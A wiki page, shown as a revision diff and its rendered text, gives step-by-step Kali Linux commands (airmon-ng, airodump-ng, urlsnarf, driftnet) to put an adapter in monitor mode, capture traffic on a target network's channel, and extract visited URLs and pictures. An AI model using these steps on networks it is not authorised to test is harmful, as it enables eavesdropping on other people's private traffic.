Difference between revisions of "WiFi Sniffing"
(Created page with "== Summary == Sniff Wi-Fi traffic using wireless interfaces supporting monitor mode and packet injection. == Requirements == * Operating system: [https://www.kali.org/down...") |
|||
| Line 11: | Line 11: | ||
=== Step 1 === | === Step 1 === | ||
Open a terminal. | |||
Display your wireless interfaces: | |||
=== | iwconfig | ||
Connect the external Wi-Fi adapter to your host computer. | |||
iwconfig | |||
The newly added interface in the list is the external adapter. In my case it was 'wlan1'. In the following steps I refer to the external adapter as 'wlan1'. | |||
Start monitor mode on the external adapter (*): | |||
airmon-ng start wlan1 | |||
The previous command creates a new interface called 'wlan1mon'. Verify with: | |||
iwconfig | |||
Display active Wi-Fi networks: | |||
airodump-ng wlan1mon | |||
Remember the channel of the network you want to attack. In my case it was channel 11. | |||
Set your adapter to the appropriate channel: | |||
iwconfig wlan1mon channel 11 | |||
Verify the frequency: | |||
iwconfig wlan1mon | |||
iwlist channel | |||
Start capturing data: | |||
airodump-ng --channel 11 -w alfa wlan1mon | |||
Filter URLs from captured traffic: | |||
urlsnarf -p alfa-01.cap | |||
Filter pictures from captured traffic: | |||
driftnet -f alfa-01.cap -a -d Pictures/ | |||
Disable monitor mode: | |||
airmon-ng stop wlan1mon | |||
---- | |||
(*) This command did not work with ALFA NETWORK AWUS036ACH. The following commands are an alternative way to start monitor mode on the adapter: | |||
ifconfig wlan1 down | |||
iwconfig wlan1 mode monitor | |||
ifconfig wlan1 up | |||
---- | |||
=== Results === | |||
== Used Hardware == | == Used Hardware == | ||
Revision as of 12:13, 12 March 2019
Summary
Sniff Wi-Fi traffic using wireless interfaces supporting monitor mode and packet injection.
Requirements
- Operating system: Kali Linux 64 Bit
Description
Step 1
Open a terminal.
Display your wireless interfaces:
iwconfig
Connect the external Wi-Fi adapter to your host computer.
iwconfig
The newly added interface in the list is the external adapter. In my case it was 'wlan1'. In the following steps I refer to the external adapter as 'wlan1'.
Start monitor mode on the external adapter (*):
airmon-ng start wlan1
The previous command creates a new interface called 'wlan1mon'. Verify with:
iwconfig
Display active Wi-Fi networks:
airodump-ng wlan1mon
Remember the channel of the network you want to attack. In my case it was channel 11.
Set your adapter to the appropriate channel:
iwconfig wlan1mon channel 11
Verify the frequency:
iwconfig wlan1mon iwlist channel
Start capturing data:
airodump-ng --channel 11 -w alfa wlan1mon
Filter URLs from captured traffic:
urlsnarf -p alfa-01.cap
Filter pictures from captured traffic:
driftnet -f alfa-01.cap -a -d Pictures/
Disable monitor mode:
airmon-ng stop wlan1mon
(*) This command did not work with ALFA NETWORK AWUS036ACH. The following commands are an alternative way to start monitor mode on the adapter:
ifconfig wlan1 down iwconfig wlan1 mode monitor ifconfig wlan1 up